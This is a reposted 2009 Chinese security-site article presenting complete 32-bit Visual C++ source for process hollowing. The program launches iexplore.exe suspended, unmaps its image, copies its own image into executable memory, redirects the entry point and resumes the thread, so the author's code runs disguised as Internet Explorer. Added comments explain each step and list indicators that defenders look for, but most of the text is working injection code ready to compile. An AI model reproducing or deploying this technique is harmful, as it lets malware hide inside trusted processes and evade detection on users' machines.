
一个将自己代码插入IE进程的例子(VC代码)

2009-8-7 12:19| 投稿: security

摘要: 看着别人的程序想插那个进程就插那个,我也想试下,于是从网上找了几段代码,最容易理解的是下面的代码,不过原来的代码编译后在VC IDE下测试正常,但离开IDE就出错,经过测试和程序启动运行知道是因为编译...

免责声明:本站系公益性非盈利IT网站,本文由投稿者转载自互联网,文末已注明出处,其内容和图片版权归原作者所有,文中所述不代表本站观点,若有侵权或转载不当之处请从网站右下角联系我们处理。

看着别人的程序想插那个进程就插那个,我也想试下,于是从网上找了几段代码,最容易理解的是下面的代码,不过原来的代码编译后在VC IDE下测试正常,但离开IDE就出错,经过测试和程序启动运行知道是因为编译后,IE尚未启动完成,程序本身已经退出是出错的原因,因些我改进了一下, 贴在下面:编译须 ntdll.lib文件(可以从http://lengie.ik8.com/test/ntdll_lib_dl.htm下载,里有Win2K,XP 32B,XP 64B三个版本,对应拷到编译器的LIB文件夹里就可以了),可将下面代码保存为 .c 文件然后编译(保存为 .cpp 文件可能会出错)
/*
 * Sample from the article: a 32-bit MSVC program that starts iexplore.exe
 * suspended, replaces the child's mapped image with a copy of its own
 * in-memory image, and resumes the child ("process hollowing" / RunPE).
 *
 * The comments below describe what each step does and where a defender
 * would look for it.  The code assumes 32-bit Windows throughout:
 * CONTEXT.Eax/Ebx/Eip, the hard-coded PEB offsets and the DWORD pointer
 * truncations are all x86-only.
 *
 * Detection notes: the call sequence CreateProcess(CREATE_SUSPENDED) ->
 * ZwUnmapViewOfSection -> VirtualAllocEx(PAGE_EXECUTE_READWRITE) ->
 * WriteProcessMemory -> SetThreadContext -> ResumeThread against the same
 * child, and a child whose in-memory image no longer matches the iexplore.exe
 * on disk, are the indicators endpoint and memory-forensics tooling keys on.
 */
#include <stdio.h>
#include <windows.h>

// ZwUnmapViewOfSection is resolved from ntdll.lib (the download mentioned above).
#pragma comment(lib,"ntdll.lib")

typedef long NTSTATUS;

// Manual prototype; the SDK headers of that era did not declare this function.
NTSYSAPI
NTSTATUS
NTAPI
ZwUnmapViewOfSection(HANDLE ProcessHandle,PVOID BaseAddress);

// Image base of the suspended child, read from its PEB by CreateInjectProcess().
// dwReserve is never used.
typedef struct _ChildProcessInfo{
    DWORD dwBaseAddress;
    DWORD dwReserve;
} CHILDPROCESS;

// Full path of iexplore.exe, filled by FindIePath(); also used as the
// (writable) command line passed to CreateProcess() in CreateInjectProcess().
char szIePath[MAX_PATH];

BOOL FindIePath(char *IePath,int *dwBuffSize);
BOOL InjectProcess(void);
DWORD GetSelfImageSize(HMODULE hModule);
BOOL CreateInjectProcess(PPROCESS_INFORMATION pi,PCONTEXT pThreadCxt,CHILDPROCESS *pChildProcess);

// Entry point for both roles of the same image: the original process
// (InjectProcess() returns TRUE) and the copy that ends up executing inside
// the hollowed iexplore.exe (InjectProcess() returns FALSE).
int main(void)
{
    if (InjectProcess()){
        printf("This is my a test code,made by shadow3.\r\n");
    }else{
        // This branch is the "payload" side: it runs in the child and never returns.
        while(1){
            MessageBox(NULL,"进程插入完成","Text",MB_OK);
            Sleep(1000);
        }
    }
    Sleep(1000);// Wait for IE to start. Adding this line makes it work, heh. The delay I chose may be a bit long.
    return 0;
}

// Builds "<system drive>:\Program Files\Internet Explorer\iexplore.exe" into IePath.
// Only the drive letter and colon of the system directory are kept
// (szSystemDir[2] = '\0') before the fixed suffix is appended.
// dwBuffSize is ignored; IePath is assumed to hold MAX_PATH bytes. Always returns TRUE.
// NOTE(review): the install location is hard-coded; if IE lives elsewhere the
// CreateProcess() call in CreateInjectProcess() simply fails.
BOOL FindIePath(char *IePath,int *dwBuffSize)
{
    char szSystemDir[MAX_PATH];
    GetSystemDirectory(szSystemDir,MAX_PATH);
    szSystemDir[2] ='\0';
    lstrcat(szSystemDir,"\\Program Files\\Internet Explorer\\iexplore.exe");
    lstrcpy(IePath, szSystemDir);
    return TRUE;
}

// Parent-side driver of the hollowing sequence.
// Returns FALSE when this image is itself running as iexplore.exe (i.e. it is
// the injected copy) or when GetModuleHandle(NULL) fails; returns TRUE otherwise,
// including on most failure paths inside the injection itself.
BOOL InjectProcess(void)
{
    char szModulePath[MAX_PATH];
    DWORD dwImageSize = 0;
    STARTUPINFO si = {0};            // unused here; CreateInjectProcess() has its own
    PROCESS_INFORMATION pi;
    CONTEXT ThreadCxt;
    DWORD *PPEB;
    DWORD dwWrite = 0;
    CHILDPROCESS stChildProcess;
    LPVOID lpVirtual = NULL;
    PIMAGE_DOS_HEADER pDosheader = NULL;
    PIMAGE_NT_HEADERS pVirPeHead = NULL;
    HMODULE hModule = NULL;

    ZeroMemory(szModulePath,MAX_PATH);
    ZeroMemory(szIePath,MAX_PATH);

    // Role check: if our own module path already equals the IE path we are the
    // copy executing inside the child, so do not inject again.
    GetModuleFileName(NULL,szModulePath,MAX_PATH);
    FindIePath(szIePath,NULL);
    if ( lstrcmpiA(szIePath,szModulePath) == 0 ){
        return FALSE;
    }

    // Base address and PE headers of the running image (the source of the copy).
    hModule = GetModuleHandle(NULL);
    if ( hModule == NULL ){
        return FALSE;
    }
    pDosheader = (PIMAGE_DOS_HEADER)hModule;
    pVirPeHead = (PIMAGE_NT_HEADERS)((DWORD)hModule + pDosheader->e_lfanew);

    // The nop padding around this call has no stated purpose in the article.
    _asm nop;_asm nop;_asm nop;_asm nop;
    dwImageSize = GetSelfImageSize(hModule);     // hModule is not used by the callee
    _asm nop;_asm nop;_asm nop;_asm nop;

    if ( CreateInjectProcess(&pi, &ThreadCxt ,&stChildProcess)){
        printf("CHILD PID: [%d]\r\n",pi.dwProcessId);

        // Unmap the child's original image, then allocate RWX memory in the child
        // at our own base address. VirtualAllocEx with an explicit address either
        // returns that address or NULL; no relocations are applied later, so the
        // copy has to land at the base this image was loaded at here.
        if ( ZwUnmapViewOfSection(pi.hProcess,(LPVOID)stChildProcess.dwBaseAddress) == 0 ){
            lpVirtual = VirtualAllocEx(pi.hProcess,(LPVOID)hModule,dwImageSize,MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);
            if ( lpVirtual ){
                printf("Unmapped and Allocated Mem Success.\r\n");
            }
        }else{
            printf("ZwUnmapViewOfSection() failed.\r\n");
            // NOTE(review): returns with the child still suspended and its handles open.
            return TRUE;
        }

        if ( lpVirtual ){
            // Ebx of the suspended initial thread is treated as the child's PEB
            // pointer and PPEB[2] as its image-base field (hard-coded x86 layout).
            PPEB = (DWORD *)ThreadCxt.Ebx;
            // Rewrite the load address.
            WriteProcessMemory(pi.hProcess,&PPEB[2],&lpVirtual,sizeof(DWORD),&dwWrite);   // return value not checked
            // Copy our whole in-memory image (headers and sections) into the child.
            if ( WriteProcessMemory(pi.hProcess,lpVirtual,hModule,dwImageSize,&dwWrite) ){
                printf("image inject into process success.\r\n");
                // Point the thread's Eax at our entry point; the address is taken from
                // the PE header's ImageBase when the copy landed at the child's original
                // base, otherwise from the address actually allocated.
                ThreadCxt.ContextFlags = CONTEXT_FULL;
                if ( (DWORD)lpVirtual == stChildProcess.dwBaseAddress ){
                    ThreadCxt.Eax = (DWORD)pVirPeHead->OptionalHeader.ImageBase + pVirPeHead->OptionalHeader.AddressOfEntryPoint;
                }else{
                    ThreadCxt.Eax = (DWORD)lpVirtual + pVirPeHead->OptionalHeader.AddressOfEntryPoint;
                }
#ifdef DEBUG
                printf("EAX = [0x%08x]\r\n",ThreadCxt.Eax);
                printf("EBX = [0x%08x]\r\n",ThreadCxt.Ebx);
                printf("ECX = [0x%08x]\r\n",ThreadCxt.Ecx);
                printf("EDX = [0x%08x]\r\n",ThreadCxt.Edx);
                printf("EIP = [0x%08x]\r\n",ThreadCxt.Eip);
#endif
                // Neither call's result is checked; the child runs from here on.
                SetThreadContext(pi.hThread, &ThreadCxt);
                ResumeThread(pi.hThread);
            }else{
                printf("WirteMemory Failed,code:%d\r\n",GetLastError());
                TerminateProcess(pi.hProcess, 0);
            }
        }else{
            printf("VirtualMemory Failed,code:%d\r\n",GetLastError());
            TerminateProcess(pi.hProcess, 0);
        }
    }
    // NOTE(review): pi.hProcess / pi.hThread are never closed on any path.
    return TRUE;
}

// Returns the size of the running executable's image by walking process
// structures by hand: fs:[0x30], then +0x0c, then +0x0c, then the DWORD at +0x20.
// Presumably PEB -> Ldr -> first loader entry -> SizeOfImage on 32-bit Windows;
// the offsets are hard-coded for that layout (TODO confirm against the target OS).
// hModule is ignored.
DWORD GetSelfImageSize(HMODULE hModule)
{
    DWORD dwImageSize;
    _asm{
        mov ecx,0x30
        mov eax, fs:[ecx]
        mov eax, [eax + 0x0c]
        mov esi, [eax + 0x0c]
        add esi,0x20
        lodsd
        mov dwImageSize,eax
    }
    return dwImageSize;
}

// Starts iexplore.exe suspended and reads its image base out of the child's PEB.
// On success fills pi, pThreadCxt (CONTEXT_FULL of the initial thread) and
// pChildProcess->dwBaseAddress. Returns FALSE only when the if-condition below
// is false (see note).
BOOL CreateInjectProcess(PPROCESS_INFORMATION pi,PCONTEXT pThreadCxt,CHILDPROCESS *pChildProcess)
{
    STARTUPINFO si = {0};
    DWORD *PPEB;
    DWORD read;
    // Start IE in suspended mode.
    // NOTE(review): the "|| MessageBox(...)" makes the condition true even when
    // CreateProcess() fails (MessageBox returns a non-zero button id), so the
    // code below then runs on an uninitialised pi.
    if( CreateProcess(NULL, szIePath, NULL, NULL, 0, CREATE_SUSPENDED, NULL, NULL, &si, pi)||MessageBox(0,":(",":(",0)){
        pThreadCxt->ContextFlags = CONTEXT_FULL;
        GetThreadContext(pi->hThread, pThreadCxt);
        // Ebx of the suspended initial thread is taken as the PEB pointer and
        // PPEB[2] is read as the image base (hard-coded x86 layout); results unchecked.
        PPEB = (DWORD *)pThreadCxt->Ebx;
        ReadProcessMemory(pi->hProcess,&PPEB[2],(LPVOID)&(pChildProcess->dwBaseAddress),sizeof(DWORD),&read);
        return TRUE ;
    }
    return FALSE;
}





